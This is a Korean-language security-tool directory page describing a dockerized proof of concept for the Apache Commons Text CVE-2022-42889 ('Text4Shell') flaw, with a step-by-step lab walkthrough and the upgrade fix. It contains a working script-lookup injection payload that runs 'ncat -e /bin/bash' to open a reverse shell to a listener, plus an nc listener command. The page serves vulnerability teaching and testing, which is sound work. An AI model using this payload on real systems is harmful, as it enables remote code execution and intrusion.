Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-42889-POC — CVE-2022-42889 취약점을 악용하는 방법을 보여주는 간단한 dockerize 애플리케이션입니다. | Kitploit
도구/GitHubGitHub/akshayithape-devops/cve-2022-42889-poc
Vulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationPayload DevelopmentLabs & Practice
GitHubakshayithape-devops/cve-2022-42889-poc

CVE-2022-42889-POC

CVE-2022-42889 취약점을 악용하는 방법을 보여주는 간단한 dockerize 애플리케이션입니다.

저장소 보기
513년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-42889-POC

Apache commons-text 취약점 CVE-2022-42889에 대한 개념 증명(PoC)입니다.

문제점 :

Apache Commons Text는 변수 보간(interpolation)을 수행하여 속성을 동적으로 평가하고 확장할 수 있습니다. 보간의 표준 형식은 "${prefix:name}"이며, 여기서 "prefix"는 보간을 수행하는 org.apache.commons.text.lookup.StringLookup 인스턴스를 찾는 데 사용됩니다. 버전 1.5부터 1.9까지의 기본 Lookup 인스턴스 집합에는 임의 코드 실행 또는 원격 서버 접촉을 초래할 수 있는 인터폴레이터가 포함되어 있습니다. 이러한 lookup은 다음과 같습니다: - "script" - JVM 스크립트 실행 엔진(javax.script)을 사용하여 표현식 실행 - "dns" - DNS 레코드 확인 - "url" - 원격 서버를 포함한 URL에서 값 로드. 영향을 받는 버전에서 기본 보간 설정을 사용하는 애플리케이션은 신뢰할 수 없는 구성 값을 사용하는 경우 원격 코드 실행 또는 의도하지 않은 원격 서버 접촉에 취약할 수 있습니다.

영향을 받는 버전 :

Apache Commons Text 버전 1.5부터 1.9까지

CVE-2022-42889-POC 취약점을 시연하는 단계별 가이드 :

1. Docker를 사용하여 애플리케이션 빌드(터미널 탭 1)

root@kitploit:~
docker build --tag=test/text4shell .

2. 애플리케이션 실행(터미널 탭 2)

root@kitploit:~
docker run -it -p 80:8080 --name text4shell test/text4shell

3. 새 터미널 탭을 열고 아래 명령을 실행합니다(터미널 탭 3)

root@kitploit:~
docker exec -it text4shell /bin/bash

4. 이제 로컬 시스템에서 리버스 셸용 리스너를 시작할 차례입니다(터미널 탭 4)

root@kitploit:~
nc -nlvp 8888

5. 앱 테스트(터미널 탭 5)

root@kitploit:~
curl http://localhost/text4shell/attack?search=<anything>

6. 이제 공격을 테스트할 차례입니다(터미널 탭 5)

공격은 "${prefix:name}" 문자열을 전달하여 수행할 수 있습니다. 여기서 prefix는 앞서 언급한 lookup입니다: ${script:javascript:java.lang.Runtime.getRuntime().exec('ncat -e /bin/bash 172.17.0.1 8888')}

root@kitploit:~
curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27ncat%20-e%20%2Fbin%2Fbash%20172.17.0.1%208888%27%29%7D

7. 이제 터미널 탭 3으로 이동하여 아래 명령을 하나씩 실행합니다

root@kitploit:~
pwd
cd /root
pwd
ls

8. 이제 터미널 탭 5로 이동하여 아래 명령을 하나씩 실행합니다

root@kitploit:~
pwd
cd /root
pwd
ls
touch hacked.txt
ls

9. 이제 터미널 탭 3으로 이동하여 아래 명령을 하나씩 실행합니다

root@kitploit:~
pwd
ls

ls 명령 후 터미널 탭 3에서 hacked.txt 파일을 볼 수 있다면 공격이 실행된 것입니다.

10. 모든 터미널을 닫습니다

이 취약점을 수정하는 방법 :

사용자는 문제가 있는 인터폴레이터를 기본적으로 비활성화하는 Apache Commons Text 1.10.0으로 업그레이드하는 것이 좋습니다.

추가 정보 :

  • NVD-NIST
도구 다운로드